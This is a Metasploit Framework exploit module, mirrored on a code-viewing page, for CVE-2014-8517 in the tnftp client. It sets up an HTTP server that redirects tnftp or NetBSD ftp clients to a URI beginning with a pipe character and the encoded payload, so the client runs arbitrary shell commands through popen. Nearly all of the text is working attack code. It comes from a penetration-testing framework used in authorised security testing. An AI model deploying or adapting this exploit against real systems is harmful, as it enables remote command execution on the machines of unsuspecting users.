Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/tnftp_savefile.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer

10
  include Msf::Auxiliary::Report

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'tnftp "savefile" Arbitrary Command Execution',

17
        'Description' => %q{

18
          This module exploits an arbitrary command execution vulnerability in

19
          tnftp's handling of the resolved output filename - called "savefile" in

20
          the source - from a requested resource.

21


22
          If tnftp is executed without the -o command-line option, it will resolve

23
          the output filename from the last component of the requested resource.

24


25
          If the output filename begins with a "|" character, tnftp will pass the

26
          fetched resource's output to the command directly following the "|"

27
          character through the use of the popen() function.

28
        },

29
        'Author' => [

30
          'Jared McNeill', # Vulnerability discovery

31
          'wvu' # Metasploit module

32
        ],

33
        'References' => [

34
          ['CVE', '2014-8517'],

35
          ['URL', 'https://seclists.org/oss-sec/2014/q4/459']

36
        ],

37
        'DisclosureDate' => '2014-10-28',

38
        'License' => MSF_LICENSE,

39
        'Platform' => 'unix',

40
        'Arch' => ARCH_CMD,

41
        'Privileged' => false,

42
        'Payload' => { 'BadChars' => '/' },

43
        'Targets' => [['ftp(1)', {}]],

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52
  end

53


54
  def on_request_uri(cli, request)

55
    unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/

56
      print_status("#{request['User-Agent']} connected")

57
      send_not_found(cli)

58
      return

59
    end

60


61
    if request.uri.ends_with?(sploit)

62
      send_response(cli, '')

63
      print_good("Executing `#{payload.encoded}'!")

64
      report_vuln(

65
        :host => cli.peerhost,

66
        :name => self.name,

67
        :refs => self.references,

68
        :info => request['User-Agent']

69
      )

70
    else

71
      print_status("#{request['User-Agent']} connected")

72
      print_status('Redirecting to exploit...')

73
      send_redirect(cli, sploit_uri)

74
    end

75
  end

76


77
  def sploit_uri

78
    (get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +

79
      Rex::Text.uri_encode(sploit, 'hex-all')

80
  end

81


82
  def sploit

83
    "|#{payload.encoded}"

84
  end

85
end

86


87